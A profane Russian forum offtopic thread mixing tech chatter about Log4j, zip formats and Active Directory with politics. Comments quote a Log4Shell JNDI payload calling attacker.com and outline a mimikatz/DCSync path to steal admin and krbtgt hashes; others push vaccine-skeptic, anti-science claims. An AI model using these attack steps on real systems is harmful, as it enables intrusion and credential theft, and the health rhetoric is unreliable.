Куча говна / Говнокод #27862 Ссылка на оригинал

0

  1. 1
Пиздец-оффтоп #39

#9: https://govnokod.ru/27098 https://govnokod.xyz/_27098
#10: https://govnokod.ru/27125 https://govnokod.xyz/_27125
#11: https://govnokod.ru/27129 https://govnokod.xyz/_27129
#12: https://govnokod.ru/27184 https://govnokod.xyz/_27184
#13: https://govnokod.ru/27286 https://govnokod.xyz/_27286
#14: https://govnokod.ru/27298 https://govnokod.xyz/_27298
#15: https://govnokod.ru/27322 https://govnokod.xyz/_27322
#16: https://govnokod.ru/27328 https://govnokod.xyz/_27328
#17: https://govnokod.ru/27346 https://govnokod.xyz/_27346
#18: https://govnokod.ru/27374 https://govnokod.xyz/_27374
#19: https://govnokod.ru/27468 https://govnokod.xyz/_27468
#20: https://govnokod.ru/27469 https://govnokod.xyz/_27469
#21: https://govnokod.ru/27479 https://govnokod.xyz/_27479
#22: https://govnokod.ru/27485 https://govnokod.xyz/_27485
#23: https://govnokod.ru/27493 https://govnokod.xyz/_27493
#24: https://govnokod.ru/27501 https://govnokod.xyz/_27501
#25: https://govnokod.ru/27521 https://govnokod.xyz/_27521
#26: https://govnokod.ru/27545 https://govnokod.xyz/_27545
#27: https://govnokod.ru/27572 https://govnokod.xyz/_27572
#28: https://govnokod.ru/27580 https://govnokod.xyz/_27580
#29: https://govnokod.ru/27738 https://govnokod.xyz/_27738
#30: https://govnokod.ru/27751 https://govnokod.xyz/_27751
#31: https://govnokod.ru/27754 https://govnokod.xyz/_27754
#32: https://govnokod.ru/27786 https://govnokod.xyz/_27786
#33: https://govnokod.ru/27801 https://govnokod.xyz/_27801
#34: https://govnokod.ru/27817 https://govnokod.xyz/_27817
#35: https://govnokod.ru/27822 https://govnokod.xyz/_27822
#36: https://govnokod.ru/27826 https://govnokod.xyz/_27826
#37: https://govnokod.ru/27827 https://govnokod.xyz/_27827
#38: https://govnokod.ru/27833 https://govnokod.xyz/_27833

Запостил: nepeKamHblu_nemyx nepeKamHblu_nemyx, (Updated )

Комментарии (495) RSS

  • Добрый день.

    Этот оффтоп сгенерирован автоматически.

    Индекс оффтопов: https://index.gcode.space/.
    Зеркала Говнокода и полезные ресурсы:
    * https://govnokod.xyz/ (альтернативный Говнокод)
    * https://gcode.space/ (read-only зеркало Говнокода)
    * https://t.me/GovnokodBot (Говнокод-бот в «Telegram»)
    * https://t.me/GovnokodChannel (Тематический канал в «Telegram»)
    * https://vorec.space/ (глоссарий Говнокода)
    * https://app.element.io/#/room/#govnokod:matrix.org (резервный чат)

    Примечание: автоматические перекаты в настоящее время осуществляются только с аккаунта nepeKamHblu_nemyx.
    Остерегайтесь подделок. Берегите себя и своих близких. Кок!
    Ответить
  • о, а теперь ютуб решил показать рекламу длиной в час и пятьдесят минут
    Ответить
      • пока нет

        было: политота, (пред)новогоднее шоу, что-то про мотоциклы и индусские музыкальные клипы

        кстати, оказалось, что вимео теперь берёт деньги за аплоад
        Ответить
      • о, только что в качестве рекламы тупо был ролик с левого канала

        блять, как я ненавижу гугл
        почему у них всё через жопу?
        Ответить
  • зачем нужны услуги выделеных каналов типа L2VPN между офисами в 2021? Чем это лучше обычного VPN через Интернет? пинг меньше?
    Ответить
    • Не все хотят покупать железо и/или пердолиться с настройкой, я думаю. А тут готовая услуга и какие-никакие гарантии (юрикам канал на 7 часов без предупреждения не отрубают, да).
      Ответить
      • Так им и Интернет не отрубают.

        Ну да, вероятно чтобы не пирдолица. MPLS выглядит просто как большой свитч: кадры влетели, и вылетели, и один бродкаст домен даже.
        Ответить
        • Ну все равно лучше VPN-туннель в резерве. А то мало ли что сломается, и пока Ростелеком приносит свои извинения, можно будет через мобилу хоть как-то работать.
          Ответить
          • Если ты осилил VPN, то зачем тогда L2VPN?

            Хотя может быть так, что Интернет у тебя 100Мб и траф лимитирован, а L2VPN 10Gb и безлимитный
            Ответить
  • А что там за 0-day уязвимость в джаве нашли? Уже жавоблядей обсирали здесь?
    Ответить
      • Не знаю. Слышал только, что сегодня с утра начали все кукарекать. У вас тоже?
        Ответить
          • Пиздец. Обосраться в логгировании.

            И эти люди ещё ругали сишников за несекьюрные printf и запрещали нам делать System.out.println (якобы bad practice)
            Ответить
            • > обосраться

              Возможно ты хотел сказать "саботировать".

              Обосраться -- это когда случайно парсер кривой. А тут всё по спеке.
              Ответить
              • А откуда мы знаем что не кривой? Это ведь только верхушка айсберга.

                > However, there are other attack vectors targeting this vulnerability which can result in RCE.
                > Depending on what code is present on the server, an attacker could leverage this existing code to execute a payload.
                > An attack targeting the class org.apache.naming.factory.BeanFactory, present on Apache Tomcat servers, is discussed in this blog post.

                Эта история вкрыла несостоятельность стольких вещей.

                Во-первых, она рушит на корню все кукареки адептов жопен-сорца про тысячи глаз и небывалую секьюрность.

                Если бекдоры лежат прямо у всех на виду, и ещё задокументированы как фича.

                Во-вторых это полная некомпетентность йажа-мартышек, которые неспособны провести элементарный аудит кода. (см. Мартышка и очки)

                В-третьих, кто знает сколько ещё в мавене лежит подобного jar-говна, которое йажа отбросы бездумно подключают к проектам. Вспомним транзитивные зависимости, которые могут тянуть этот лох4ж для какой-то левой питушни.
                Ответить
                • > это рушит на корню все кукареки адептов жопен-сорца про тысячи глаз и небывалую секьюрность

                  Это вроде ещё OpenSSL семь лет назад показал.
                  Ответить
                  • Ну там либа мозголомной сложности.

                    А тут намеренный бекдор для remote code execution.

                    Причём решение очень интерпрайсное использующее JNDI и LDAP.
                    Ответить
                    • > либа мозголомной сложности

                      На ровном месте, если честно...

                      В некоторых функциях вообще невозможно понять поток данных (и они текут и крашатся под фаззером, т.е. и автор сам нихуя не понял).
                      Ответить
                      • Аахаха. Так они запутались в своих AbstractProxyFactoryBuilder, что даже нормально почнить это c первого раза не сумели.

                        December 10, 2021
                        Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability Under Exploitation

                        As of Tuesday, Dec 14, version 2.15.0 was found to still have a possible vulnerability in some apps. We recommend updating to 2.16.0 which disables JNDI and completely removes %m{lookups}.

                        https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046

                        Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

                        This issue can be mitigated in prior releases (<2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).


                        Причём чтобы быть уверенным они предлагают распотрошить jar и руками (!) выпилить из него какое-то файло.

                        Бамп отсосу жавашатни.
                        Ответить
                        • Кстати, в J2SE всегда безопасно потрошить jar зипом? Для сравнения в J2ME и в Андроиде нужно ещё делать zipalign, чтобы выровнять заголовки до круглых смещений.
                          Ответить
                          • > всегда безопасно потрошить jar зипом

                            Хз. Просто выглядит очень дико.
                            Ведь жары почему-то пакуют утилитой jar, а не zip. А тут такой костыльный хак.

                            > чтобы выровнять заголовки до круглых смещений

                            Емнип круглые смещения это питумизация для mmap, чтобы по-царски мапить классы в память.
                            Ответить
                            • > классы

                              Скорее картинки и прочие ресурсы. Классы то они вообще трансформят в какую-то свою хуйню при установке проги.
                              Ответить
                            • У зипа ещё в заголовках есть «extraField», куда разные программы могут кидать свои проприетарные данные. Кто знает, используют ли это поле jar и загрузчик классов.

                              Ещё проблема с датами (PKZIP заполняет только дату модификации, а на остальные даты кладёт) и с кодировкой имён файлов для символов за пределами ASCII (я приводил реальные примеры, как некоторые архиваторы в локальную запись и в центральный каталог пишут имена файлов в РАЗНЫХ кодировках). Хотя для Йажи кодировка не проблема, она только базовую латиницу использует...

                              Ещё гипотетически может быть жопа, если в упаковываемом каталоге есть симлинки. Поскольку зип их не поддерживает, по идее архиватор толже сделать deep copy, но кто знает, как это сделали в реальных архиваторах.
                              Ответить
                              • Там ещё непонятно какие размеры словарей для zip архивов поддерживает Йажа.

                                Ну и конечно хеши в манифестах архиватор не обновит.

                                https://docs.oracle.com/javase/6/docs/technotes/guides/jar/jar.html

                                Signature Validation
                                The signature over the signature file is first verified when the manifest is first parsed. For efficiency, this verification can be remembered. Note that this verification only validates the signature directions themselves, not the actual archive files.

                                The manifest main attributes are also verified when verification information is available in the signature file. If an x-Digest-Manifest-Main-Attributes entry exists in the signature file, it is compared against a digest calculated against the main attributes in the manifest file. If this calculation fails, then jar validation fails. This decision can be remembered, for efficiency. If an x-Digest-Manifest-Main-Attributes entry does not exist in the signature file, its nonexistence does not affect jar validation and the manifest main attributes are not verified.

                                To validate a file, a digest value in the signature file is compared against a digest calculated against the corresponding entry in the manifest file. Then, a digest value in the manifest file is compared against a digest calculated against the actual data referenced in the "Name:" attribute, which specifies either a relative file path or URL.

                                Example manifest file:

                                Manifest-Version: 1.0
                                Created-By: 1.3 (Sun Microsystems, Inc)

                                Name: common/class1.class
                                MD5-Digest: (base64 representation of MD5 digest)
                                Ответить
                                • > размеры словарей для zip архивов

                                  Да там вроде 32 килобайта максимальный оффсет?
                                  Ответить
                                  • > Да там вроде 32 килобайта

                                    7zip уже многие годы поддерживает размер словаря 64Kb.
                                    Ответить
                                    • > 7zip

                                      7zip и гигабайты поддерживает в своём формате...

                                      Но нахер портить классический zip? Он же для совместимости существует, а не для топовой компрессии.
                                      Ответить
                                      • > Но нахер портить классический zip

                                        7zip это мелочи.

                                        А вот использование 64kb словаря вездесущим windows explorer делает такие архивы повсеместными.

                                        We allow decompression of Zip64 zips but not if they contain entries compressed with Deflate64.
                                        This is somewhat problematic, as zips created by the Windows explorer utility that are >2gb are compressed using Deflate64.

                                        ZLib doesn't support deflate64, so it would need to be our own implementation.


                                        >7zip и гигабайты поддерживает в своём формате...
                                        Так то его внутренний формат, а это deflate, который вообще везде от png до content-encoding в http.
                                        Ответить
                                        • deflate64 в png или http разве работает?

                                          Там же вроде жопа в том, что этот бит во внешнем хедере, а не в хедере deflate потока. Именно поэтому он прикручен только в zip64, где всё равно хедера несовместимые.

                                          А 64 у них в названиях случайно совпали... В одном случае это 64 килобайтное окно, в другом это 64 битная длина.

                                          Или в http добавили какой-то новый энкодинг в духе deflate64?
                                          Ответить
                                          • > deflate64 в png или http разве работает?

                                            Похоже что нет.

                                            Но всегда можно улучшить сжатие, попутно сломав половину интернета.

                                            Кстати, как ещё очередной web-поттеринг не догадался это сделать?
                                            Ответить
                                            • Некоторые веб-браузеры и некоторые сервера поддерживают зожатие bzip2 в HTTP. Так что сломать интернеты можно уже прямо сейчас, включив на сервере bzip2 и отключив отдачу без зожатия.
                                              Ответить
                                              • > сломать интернеты

                                                Для этого надо быть гуглом, чтобы ещё свой браузер был, в котором всё работает и с новым запатентованным зожатием.
                                                Ответить
                                                • Совсем недавно можно было сломать интернеты, выложив картинку в APNG (её не поддерживал Хром) или в WebP (её не поддерживал Фуррифокс). Теперь оба формата есть везде.

                                                  Были сборки браузеров с поддержкой TIFF, MNG, JPEG-XR, JPEG2000, WBMP, P*M и ещё какой-то редкой питушни.
                                                  Ответить
                                              • > зожатие bzip2 в HTTP

                                                Там ещё много прикольных штук, которые припали пылью.

                                                apng, который даже Щозiла задепрекейтила и выпилила из ГiгеГох.

                                                jpeg с арифметическим зожатием вместо Хаффмана (-15% размера при том же качестве).

                                                Кстати apng мне недавно пригодился для генереций thumbnail в ffmpeg.
                                                Ответить
                                                • > jpeg с арифметическим зожатием

                                                  jpeg2000? Он поди на патенты напоролся, а потом тупо стал нинужным т.к. видеокодеки и статику жмут своим интра-кодером лучше чпега?
                                                  Ответить
                                                  • > jpeg2000

                                                    Неа.
                                                    JPEG2000 это питушарские waveletы.

                                                    А ariphmetic jpeg это такое же jpeg, у которого DC и классический 8x8 DCT, но последняя энтропийная стадия заменена на арифметику.

                                                    В принципе можно существующие jpegи без потерь пережимать в арифметику и получать +15-20%. Правда очень мало софта знают как с ними работать.

                                                    https://github.com/libjpeg-turbo/libjpeg-turbo/issues/120

                                                    See also:
                                                    https://bugzilla.mozilla.org/show_bug.cgi?id=680385
                                                    https://bugs.chromium.org/p/chromium/issues/detail?id=669501
                                                    Ответить
                                                    • А, ну такое по идее даже в железках можно было бы поддержать апдейтом прошивки...
                                                      Ответить
                                                  • > Он поди на патенты напоролся

                                                    Верно. Но это часть оригинального стандарта JPEG (необязательная)

                                                    The JPEG standard also allows, but does not require, decoders to support the use of arithmetic coding, which is mathematically superior to Huffman coding. However, this feature has rarely been used, as it was historically covered by patents requiring royalty-bearing licenses, and because it is slower to encode and decode compared to Huffman coding.

                                                    The JPEG specification cites patents from several companies. The following patents provided the basis for its arithmetic coding algorithm.[1]

                                                    IBM
                                                    U.S. Patent 4,652,856 – February 4, 1986 – Kottappuram M. A. Mohiuddin and Jorma J. Rissanen – Multiplication-free multi-alphabet arithmetic code
                                                    U.S. Patent 4,905,297 – February 27, 1990 – G. Langdon, J.L. Mitchell, W.B. Pennebaker, and Jorma J. Rissanen – Arithmetic coding encoder and decoder system
                                                    U.S. Patent 4,935,882 – June 19, 1990 – W.B. Pennebaker and J.L. Mitchell – Probability adaptation for arithmetic coders
                                                    Mitsubishi Electric
                                                    JP H02202267 (1021672) – January 21, 1989 – Toshihiro Kimura, Shigenori Kino, Fumitaka Ono, Masayuki Yoshida – Coding system
                                                    JP H03247123 (2-46275) – February 26, 1990 – Fumitaka Ono, Tomohiro Kimura, Masayuki Yoshida, and Shigenori Kino – Coding apparatus and coding method


                                                    Все референсные утилиты должны его поддерживать.
                                                    Ответить
                                                • APNG сейчас вроде везде работает?

                                                  Или в каких-то совсем новых версиях задепрекейтили?
                                                  Ответить
                                                  • > APNG сейчас вроде везде работает?

                                                    Да, действительно. Значит я спутал его с другой пишутней, которую уёбушки поддерживали, а потом дропнули.

                                                    https://caniuse.com/apng

                                                    Просто в APNG сделали по уму, с graceful fallback. Если софт не может его прочитать он всё-равно показывает первый кадр, т.к. apng является валидным png.
                                                    Ответить
                                            • Дарю ещё идею: PNG, в которых не 8 бит на цвет, а 16 или больше. Такие используются в HDR. С ними вообще мало софта умеет работать.
                                              Ответить
                                              • Десятибитные видео ещё. По-моему только у анимешников прижились. И аппаратным плейерам от них очень хуёво было. Х.з. как сейчас.
                                                Ответить
                                                • Ввожу в «Яндекс» запрос «десятибитное видео». Первая ссылка ведёт на «desu.me».
                                                  Ответить
                                      • Кстати, классический зип поддерживал методы зожатия Shrink, Reduce, Implode. Метод Deflate появился позже.

                                        Все ли библиотеки сейчас поддерживают старые алгоритмы для совместимости?
                                        Ответить
                                • А манифест вроде обновляет программа jarsign или типа того.

                                  Сам jar должен удалять записи из манифеста, если удаляем классы?
                                  Ответить
                                  • > манифеста

                                    Там вроде RSA подпись разраба? Так что хуй ты что поменяешь в чужом джаре, если он подписан...
                                    Ответить
                                    • Это если эту подпись проверяют и знают, какая должна быть. А так варианты от «Подписана? Так распиши обратно.» до «Переподпиши своей подписью.»
                                      Ответить
                                      • Ну тоже верно. Десктопная и серверная джава поди и не смотрит особо.
                                        Ответить
                              • А что если зожать в Zip64 используя Deflate64 (64 KB словарь)?

                                Я помню зожимал 7zipом такие архивы с Deflate64, которые потом в большей части программ (включая WinRAR) просто не открывались.
                                Ответить
                • > аудит

                  У джавы модель безопасности хуёвая, к сожалению. Все надеются, что "недоверенный" код не будет иметь прав и качают рандомное говно с инета. Но вокруг него крутятся мегабайты кода "доверенного", который писали индусы, не понимающие какую ответственность на них возлагают при вызове doPrivileged()... В итоге имеем то что имеем.
                  Ответить
                  • Помню в апачах был эпичный RCE при десериализации какой-то питушни.

                    https://www.cvedetails.com/cve/CVE-2014-0114/

                    По-моему тоже полубекдор.

                    Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

                    Просто анскильные отбросы не отключили свойство отвечающее за удалённое исполнение кода.
                    Ответить
                    • > анскильные отбросы не отключили

                      Скорее анскильные отбросы включили его по-умолчанию.
                      Ответить
                      • Или так.

                        Очень похоже на лох4жо питушню.
                        > In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load a remote codebase using LDAP.

                        То есть намеренно делают какой-то анальный зонд, и оставляют включенным по дефолту.
                        Ответить
                    • На сишке ты боишься парсить внешние данные, стараешься их избегать по возможности.

                      А джавист надеется на "безопасность" jvm и ходит в интернет как к себе домой. Слабоумие и отвага.
                      Ответить
                      • Самое ужасное и смешное, что на этом вязком болоте с квакающей йажей адепты постоянно пытаются отстроить сияющий замок.

                        В обличье «солидных» функциональных язычков вроде Scala или Closure.

                        А в реале собрали худшего со всех миров.

                        Скорость компиляции как у черепахи (медленее С++), скорость исполнения в разы меньше чем у той же Йажи (скоро даже тайпскриптуха обгонит), никакой секьюрности, головоломная сложность языка, полуфункциональный полуимперативный франкенштейн.
                        Ответить
                      • > На сишке ты боишься парсить внешние данные, стараешься их избегать по возможности.

                        – мне нравится, что сишники преподносят это как фичу своего язычка
                        Ответить
                        • В сишке (и крестах) ещё одна охуенная фича есть: со строками настолько противно работать, что безопасно передать данные в базу легче, чем поклеить SQL запрос с инъекцией...
                          Ответить
                          • ну в крестах можно собрать строку относительно легко через ostringstream какой-нито, не?
                            Ответить
                            • Безопасная передача один хер короче выходит, чем эти "x = \"" << cxx_real_escape(x) << "\""
                              Ответить
                              • В смысле bind параметров?:)

                                Да. Хотя тут дело в культуре еще: в перле строковая интерполяция с 1987-го года, однако там почему-то всегда делали через привязку параметров, а в пыхе клеили строки

                                Долбоебы умудрялись даже в питоне получить инъекцию, хотя там "f" строк еще не было к тому моменту
                                Ответить
                • > тысячи глаз и небывалую секьюрность

                  У семи нянек дитя без глаза.

                  Все думают, что кто-то другой почитал.
                  Ответить
                • > элементарный аудит

                  Для аудита надо код особым образом писать, явно выделяя TCB, а не размазывая его тонким слоем по мегабайтам.

                  А написанный в обычном стиле код бесполезно аудитить, имхо. Сизифов труд.
                  Ответить
                  • Мне иногда кажется паттерны фабрик билдеров, декораторы, адапетеры и прочая GoF дрисня — средство намеренной обфускации кода.

                    Вспоминается решето Эратосфена из «чистого кода», в котором мы долго не могли разобраться. И которое в итоге слило самому наивному решению.
                    Ответить
                    • > обфускации кода

                      Если тебе для аудита системы нужно читать ничем не ограниченные гигабайты индусятины -- это уже архитектурный провал. Даже если там всё красиво и понятно.
                      Ответить
              • > This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process

                то есть я под iOS должен руками в конфиге указать все домены, на которые приложение может лезть по http, а жаба идёт по рукам без объявления войны?
                Ответить
                • А толку?

                  В Яббл тоже обосрались.

                  > Cloud services like Steam, Apple iCloud, have already been found to be vulnerable.
                  Ответить
                  • когда у тебя десять жоп, сложно хотя бы парочкой не обосраться
                    Ответить
        • >${jndi:ldap://attacker.com/a}

          и эти люди смеются на PHP 🙂
          Ответить
          • Только вчера говорили что

            «PHP» — выбор профессионалов.

            «Йажа» — выбор лоботомированного копропротивного отребья.
            Ответить
        • > при записи в лог строчки
          > идет на сервак, указанный в ней
          > и грузит оттуда код

          По-моему это уже не уязвимость, а умышленный бекдор... Ещё поди и задокументированный?
          Ответить
          • Хм... хм... тайная ложа или явная лажа... явная ложа или полная йажа...
            Ответить
              • нету уже ни чайной ложки, ни идеальной чашки

                В моем районе так тчоно нет, может в центре е
                Ответить
                  • Ну есть центр
                    А есть центр-центр

                    Я не на Невском живу
                    Ответить
                    • – Привет, ты откуда?
                      – Из Киева.
                      – Что делаешь на выходных?
                      – Поеду домой.
                      Ответить
                      • Новый год принято отмечать дома, в кругу семьи, потому на новогодние праздники Москва пустеет
                        Ответить
        • Пхахаха. Охуенно.

          > Что должно в голове твориться
          Ынтырпрайз.
          Ответить
  • «Каких-нибудь 10–15 лет назад тезис «в Интернет по паспорту» казался шуткой. А «вычислить по IP» было таким мемом, в который всерьез никто не верил. Сейчас, наверное, минимум 95 % пользователей Сети так или иначе видны «кому надо» как на ладони — со всеми своими паспортными данными. Да, какая-то часть, небольшая ниша, научилась так или иначе скрываться, но они составляют скорее статистическую погрешность и пребывают в очевидно «несоциальном» положении. Так же и с арендой. Наверное, добиться 100 % легализации так никогда и не удастся, но вряд ли задача перед Минстроем стоит сейчас именно так», — говорит риелтор с 25-летним опытом работы в Петербурге.
    Ответить
    • Я сегодня только слушал как пожилых людей развели мошенники по телефону на 700К, и полиция ничего сделать не может.

      Когда ты пишешь политический комментарий или снимаешь деньги в банке, то ты под колпаком.
      Теперь вот даже квартиру сдавать будешь под колпаком.
      Симку без паспорта хуй купишь. Разговоры все записываются и хранятся три года по закону Яровой.

      А когда тебя кинули на бабло, так сразу у нас такая свобода везде, что полиция никого поймать не может.
      Ответить
      • тут ещё такой юмор

        > эта идея направлена на защиту участников арендных отношений

        я снимал один раз квартиру у физлица-предпринимателя, переводил ему бабло на его соответствующий счёт. то есть типа мы работали в легальном поле (хотя кмк там были серьёзные нюансы)

        почувствовал ли я себя защищённее, как участник арендных отношений? а вот хуй
        Ответить
      • Если банкомат тебе по ошибке выдаст лишнюю купюру, и ты её в течение пары недель не вернёшь банку, тебя будут судить за кражу (хотя это косяк банка).

        Если вернёшь в срок, то вместо благодарности будет всего лишь «освобождение от уголовной ответственности».

        Если же тебя банк кинет на деньги, то... ну, бывает.

        Фактически у нас правит не «легитимная» власть, а обезличенный капитал. У кого больше денег, тот для себя может купить любой закон и любой суд.
        Ответить
        • Не кража, а незаконное обогащение, вань.

          Еще менее верится мне в честность мужика. Меня высокопарно уверяют, что он не украдет и цветка из сада своего царя: тут я не спорю, я знаю, каких чудес можно достигнуть с помощью страха; но я знаю и то, что сии образцовые придворные селяне не упустят случая обворовать своих соперников на один день, знатных господ, ежели те, излишне умилившись присутствием крестьян во дворце и положившись на чувство чести рабов, облагороженных государевой лаской, перестанут на миг следить за движениями их рук. Вчера на императорском и народном балу, во дворце в Петергофе, у сардинского посла весьма ловко вытащили из кармашка часы: их не защитила и предохранительная цепочка. Множество людей лишились под шумок своих носовых платков и иных предметов. У меня самого пропал кошелек с несколькими дукатами, но я смирился с его потерей, посмеиваясь в душе над господами, что возносили хвалы честности своего народа. Господа эти отлично знают цену своим красивым словам; однако я вовсе не прочь узнать ее так же хорошо, как они сами. Наблюдая столько бесполезных ухищрений, я ищу тех, кто принимал бы эти ребяческие обманы за чистую монету, и восклицаю, вслед за Базилем: «Кто кого здесь проводит за нос? Все в заговоре!»
          Ответить
      • Да ни хуя они не записываются. И не хранятся. Мы живем в путинской россии, когда всем насрать. Лишь бы отчитаться - и гора с плеч.

        О массовой слежке речи нет. На деле этот закончик позволяет легально следить за лицами, реально интересными ФСБ, чьи деяния кому-то неугодны, чтобы впоследствие впендюхать им пиздюдей.

        Для того, чтобы закон работал, нужно было предусмотреть массу нюансов, например, выуживать реальный хабар нейронкой и пропускать треш, хотя бы потому, чтобы не сохранять например мой спам и флуд на сайтах, на десятки гагибайт. Иной раз я задавал в поле 'юзер-агент' строку, длиной в мегабайт и более (ибо внятных ограничений на размер поля нет), чтобы поскорее забить логи сервера.
        Ответить
  • Президент Зеленский выступил на саммите Байдена и призвал сделать мир более свободным и безопасным

    Вова, ёбаные гуси, я ж только за. Давай для начала сделаем более свободным вход в кафе и рестораны, как тебе?
    Ответить
    • Ок, ты полностью свободен не ходить в ресторан и обезопашен от неприятных встреч, которые могли бы случится в ресторане.
      Ответить
      • это свободный не-вход.

        а я про свободный вход. и желательно свободный выход.
        Ответить
        • Ты свободен сделать прививку и входить в рестораны.
          Ответить
          • блять, я смотрю, тут одни президенты вокруг собрались
            Ответить
          • > Ты свободен сделать прививку и входить в рестораны.

            Ты свободен, только сначала сходи на опыт доктору к Менгеле, а потом будет ресторан.

            Двоемыслие во всей красе.
            Ответить
            • У меня возникла хорошая идея для наброса, правда применить негде, т.к. кроме уютненького я нигде не пишу.
              1. Надо у любителей науки и борцов с антинаукой просить с ходу назвать критерий, фальсифицирующий текущую коко-видовую парадигму. Ну, чтобы она по критерию Поппера могла называться научной.
              2. Если они этот критерий назвать не могут, обзывать их мракобесами.
              3. Если могут, скринить пост и через месяц тыкать в него носом.
              Ответить
              • > Надо у любителей науки и борцов с антинаукой просить с ходу назвать критерий, фальсифицирующий

                Сейчас людей всё чаще призывают просто верить в науку, слепо доверять ученым. Вот именно в такой формулировке.

                То есть это очередная религия, только с верой во всемогущих учёных и науку.

                Раньше основным научным методом был эксперимент: в данных условиях сделали А, получили Б. Описали результат, опубликовали.
                Любой желающий может повторить и убедиться в идентичности полученных результатов.

                Сейчас всё не так. Нас призывают верить каким-то британским учёным, врачам-убийцам.

                Причём заявления у них: «шарик есть», извините ошиблись «шарика нет».

                Это не наука, а сплошная цыганщина.

                В принципе такой профанации следовало ожидать, когда людей начали выпизживать за неполиткорректное псто в интернете или высказывание не ложаееся в повестоку.
                Ответить
  • сук
    #include <span class="code-keyword"><afxwin.h>         // MFC core and standard components</span>
    #include <span class="code-keyword"><afxext.h>         // MFC extensions</span>
    Ответить
    • Ну, в самом деле, разница между этими словами несущественна.
      Ответить
    • > на его машину заходит доменный админ

      А нехуй по чужим машинам шариться!
      Ответить
      • а драйвер как поставить?

        Нет, срьезно, кажется что AD лучше не пользоваться вовсе. Нахуй нужен доменный админ, если им нельзя ходить на машины?
        Ответить
        • А как атака работает?

          З.Ы. А, заходит прям с передачей кредов, а не цербером. Ну тогда логично.
          Ответить
          • атака работает так: мимикац имеет привилегию Debug (бо локлаьный админ), цепляется к LSSAS и пиздит токен или хеш пароля.

            Просто не используйте доменного админа никогда ни для чего кроме захода на контроллер DC, и всё.
            алсо, есть вот https://winitpro.ru/index.php/2016/10/19/vremennoe-chlenstvo-v-gruppax-active-directory/

            Блядь это же каша из топора просто.

            Ой, у нас всё централизованно, просто добавь себя в группу Админы и ходи везде.
            Ой, не везде.
            Ой, лучше не ходи.
            Ой, заведи лучше отдельную учетку для каждого серввера
            Ой, и отдельный аккаунт для каждого сервиса

            нахуя AD вообще?
            Ответить
            • > пиздит токен

              Блин, дык церберские токены же к тачке привязаны и их бесполезно куда-то передавать... Или нет?
              Ответить
                  • NTLM-хеш доменной учетной записи krbtgt.

                    ХЕШ БЛЯДЬ пароля аккаунта который может ВСЕ ключи выдавать в сфере.
                    Ответить
                    • А нахуя этот хеш от рута вообще передаётся за пределы кдц?
                      Ответить
                      • хороший вопрос

                        описаны способы его спзидить с контроллера

                        The NTLM hash of the krbtgt account can be obtained via the following methods:

                        DCSync (Mimikatz)
                        LSA (Mimikatz)
                        Hashdump (Meterpreter)
                        NTDS.DIT
                        DCSync (Kiwi)

                        например так

                        The DCSync is a mimikatz feature which will try to impersonate a domain controller and request account password information from the targeted domain controller. This technique is less noisy as it doesn’t require direct access to the domain controller or retrieving the NTDS.DIT file over the network.


                        Похоже, что я малось напиздел, но суть не сильно меняется

                        * Можно на машине спиздить хеш админского пароля
                        * В спокойной обстановке его брутнуть
                        * зайти на контроллер
                        * утянуть хеш krbtgt с контроллера домена

                        либо прикинуться контроллером и получить его как реплику
                        Ответить
                        • > прикинуться контроллером

                          Какой багор )))

                          Но для этого видимо доменный админ нужен, не может же рандомная тачка стать контроллером?
                          Ответить
                          • ..которым можно стать если ты админ локальный а к тебе на тачку сходил админ доменный?)

                            This is controlled by the Replicating Changes permissions set on the domain. Having the Replicating Changes All and Replicating Directory Changes permission will allow you to perform this attack.

                            https://stealthbits.com/wp-content/uploads/2017/07/1.png

                            Но по умолчанию тока у админа, да.

                            То есть
                            * Я стал админом
                            * Я спиздил хеш
                            * Мой аккаунт админа удалили
                            * А мне похуй

                            То есть, пароль этого прекрасного сервиса нужно ментоять
                            Ответить
                            • > менять

                              Ещё поди полный ребут домена надо для его смены? Хотя выпнуть всех нахуй и аккуратно добавить по одному в любом случае не помешает...
                              Ответить
                              • ну я так понимаю что сломаются все тикеты, но наверное это не стращно делать ночью

                                https://docs.microsoft.com/ru-ru/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password

                                Эту операцию следует выполнять дважды. При сбросе пароля учетной записи службы центр распространения ключей дважды требуется 10-часовой период ожидания между перезагрузками. 10 часов — это Максимальное время существования билета пользователя и Максимальное время существования для параметров политики билета службы , поэтому в случае изменения максимального времени существования минимальный период ожидания между сбросами должен быть больше заданного значения.
                                Ответить
                                • > дважды

                                  Сбросить, поплясать с бубном 10 часов и ещё сбросить? Пиздец.
                                  Ответить
                                  • А вот это вам как?

                                    Рекомендуется для доменного админа запретить делегиование, а по умолчанию можно

                                    By default, all accounts in Active Directory can be delegated. Delegation allows a computer or service to present the credentials for an account that has authenticated to the computer or service to other computers to obtain services on behalf of the account
                                    Ответить
                                    • Удобно же -- ты идёшь на веб сервер, он твои креды юзает чтобы сходить в базу...
                                      Ответить
                                      • ну да, оно для того и делалось.

                                        И вот ты админ идешь такой на сервер который программист написал, а там бага

                                        Причем вроде это никак не спрашивается у меня, тупо ставишь галочку в IIS и всё.

                                        Нужно всем аккаунтам явно ставить "this account is sensible and can't be used for delegation". А почему блядь она по умолчанию не стоит?
                                        Ответить
                                  • А, ну вот они пишут про бест практсиы:

                                    This will prevent members of the Administrators group from being used to log on or connect to member servers or workstations (unless multiple controls are first breached), where their credentials could be cached and thereby compromised. A privileged account should never be used to log on to a less-privileged system, and enforcing these controls affords protection against a number of attacks.

                                    When Administrators access is required, the accounts needing this level of access should be temporarily placed in the Administrators group for the domain in question


                                    То есть
                                    * нельзя никогда нигде под доменным админом сидеть (вот сюрприз-то)
                                    * нельзя им заходить на мутнные тачки
                                    * добавился в админы --> сделал дело --> убрался --> сменил пароль ебаного выдавателя билетов

                                    так?
                                    Ответить
                                    • > should never be used
                                      > on a less-privileged system

